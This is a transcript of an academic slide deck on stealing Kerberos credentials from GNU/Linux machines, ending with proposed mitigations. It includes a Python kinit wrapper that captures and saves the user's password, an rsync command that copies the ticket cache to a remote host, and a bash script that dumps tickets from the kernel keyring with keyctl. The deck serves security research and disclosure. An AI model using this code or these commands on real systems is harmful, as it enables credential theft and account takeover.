Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer...
Transcript of Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer...
![Page 1: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/1.jpg)
Kerberos Credential Thievery
(GNU/Linux)
Ronan Loftus, Arne Zismer
July 3, 2017
![Page 2: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/2.jpg)
Context
![Page 3: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/3.jpg)
Kerberos I
• Authentication protocol
• Reduce amount of sensitive credentials sent over the
network
• Commonly used in Linux networks (e.g. Hadoop)
1/18
![Page 4: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/4.jpg)
Research Question
Can Kerberos credentials be stolen from
GNU/Linux machines?
2/18
![Page 5: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/5.jpg)
Related Work
• Sniffing and replaying Kerberos credentials on the
network [1]
• Extracting Kerberos credentials from Windows machines
with Mimikatz [2]
3/18
![Page 6: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/6.jpg)
Approach
![Page 7: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/7.jpg)
Kerberos II
Figure 1: Kerberos protocol 4/18
![Page 8: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/8.jpg)
Kerberos II
Figure 2: Kerberos protocol 4/18
![Page 9: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/9.jpg)
Kerberos II
Figure 3: Kerberos protocol 4/18
![Page 10: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/10.jpg)
Kerberos II
Figure 4: Kerberos protocol4/18
![Page 11: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/11.jpg)
Kerberos II
Figure 5: Our test setup4/18
![Page 12: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/12.jpg)
Kerberos II
• Tickets are stored in credential caches:
• File
• Keyring
• Memory
5/18
![Page 13: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/13.jpg)
Attacks
![Page 14: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/14.jpg)
Credential Cache (File)
Figure 6: Structure of a credential cache
6/18
![Page 15: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/15.jpg)
Keylogging I
• Targeted keylogger
• Path manipulation
7/18
![Page 16: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/16.jpg)
Keylogging II
1 if __name__ == '__main__':
2 krbuser = argv[1]
3 child = spawn('/usr/bin/kinit {}'
.format(krbuser))
4 prompt =
child.read_nonblocking(1024).decode('utf-8')
5 password = getpass(prompt)
6 child.sendline(password)
7 with open("creds.txt", "w") as f;
8 f.write(password)
8/18
![Page 17: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/17.jpg)
File Copying
• Default credential storage
• Contains all relevant authentication information
rsync /tmp/krb5cc_$(id -u) [email protected]:
9/18
![Page 18: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/18.jpg)
Query Kernel Keyring I
What is a keyring?
What is keyctl?
1. Find the right keyring
2. Dump the credential fragments
3. Rebuild them as file
4. ???
5. Profit
10/18
![Page 19: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/19.jpg)
Query Kernel Keyring I
What is a keyring?
What is keyctl?
1. Find the right keyring
2. Dump the credential fragments
3. Rebuild them as file
4. ???
5. Profit
10/18
![Page 20: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/20.jpg)
Query Kernel Keyring I
What is a keyring?
What is keyctl?
1. Find the right keyring
2. Dump the credential fragments
3. Rebuild them as file
4. ???
5. Profit
10/18
![Page 21: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/21.jpg)
Query Kernel Keyring II
1 #!/bin/bash
2
3 keyring_name="u_name"
4 krb_keyring=$(keyctl search @s "keyring" "_krb_${keyring_name}" 0)
5 keyring=$(keyctl search ${krb_keyring} "keyring" "${keyring_name}" 0)
6 key_components=( $(keyctl rlist ${keyring}) )
7
8 tmp_dir=$(mktemp -d)
9 for i in ${!key_components[@]}; do
10 SPN="$(keyctl rdescribe ${key_components[${i}]} | rev | cut -d';' -f1 | rev)"
11 keyctl pipe "${key_components[${i}]}" > "${tmp_dir}/${SPN}.bin"
12 done
13
14 cat ccache_header_data > krb5cc_$(id -u)
15 cat ${tmp_dir}/__krb5_princ__.bin >> krb5cc_$(id -u)
16 find ${tmp_dir} -name "*krbtgt*" -exec cat {} \; >> krb5cc_$(id -u)
17 rm -rf ${tmp_dir}
11/18
![Page 22: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/22.jpg)
Dumping Process Memory
1. Create process containing
ticket
2. Dump its memory
3. Find the encrypted blocks
4. Extract them
5. Transplant them into a file
12/18
![Page 23: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/23.jpg)
Demo
13/18
![Page 24: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/24.jpg)
Demo
DEMOPraise be to Cthulhu!
14/18
![Page 25: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/25.jpg)
Wrapping Up
![Page 26: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/26.jpg)
Conclusion
Password
X
File Ticket
X
Keyring Ticket
X
Process Ticket
X
Tickets can be stolen :(
15/18
![Page 27: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/27.jpg)
Conclusion
Password XFile Ticket
X
Keyring Ticket
X
Process Ticket
X
Tickets can be stolen :(
15/18
![Page 28: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/28.jpg)
Conclusion
Password XFile Ticket XKeyring Ticket
X
Process Ticket
X
Tickets can be stolen :(
15/18
![Page 29: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/29.jpg)
Conclusion
Password XFile Ticket XKeyring Ticket XProcess Ticket
X
Tickets can be stolen :(
15/18
![Page 30: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/30.jpg)
Conclusion
Password XFile Ticket XKeyring Ticket XProcess Ticket X
Tickets can be stolen :(
15/18
![Page 31: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/31.jpg)
Conclusion
Password XFile Ticket XKeyring Ticket XProcess Ticket X
Tickets can be stolen :(
15/18
![Page 32: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/32.jpg)
Mitigations
Password: Absolute path, secure path
File Ticket: Don’t use it!
Keyring Ticket: Choose the most shorted lived keyring
Process Ticket: RAM encryption?
16/18
![Page 33: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/33.jpg)
Extensions
• Automate Acquisition of tickets from process memory
• Extend to every keyring type
17/18
![Page 34: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/34.jpg)
Questions?
![Page 35: Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer July 3, 2017. Context. Kerberos I Authentication protocol Reduce amount of sensitive](https://reader033.fdocuments.net/reader033/viewer/2022053021/604aa93ca5b8a5626d33d9af/html5/thumbnails/35.jpg)
References
Emmanuel Bouillon.
Taming the beast: Assess kerberos-protected
networks, 2009.
Benjamin Delpy.
Mimikatz.
https://github.com/gentilkiwi/mimikatz, 2014.
18/18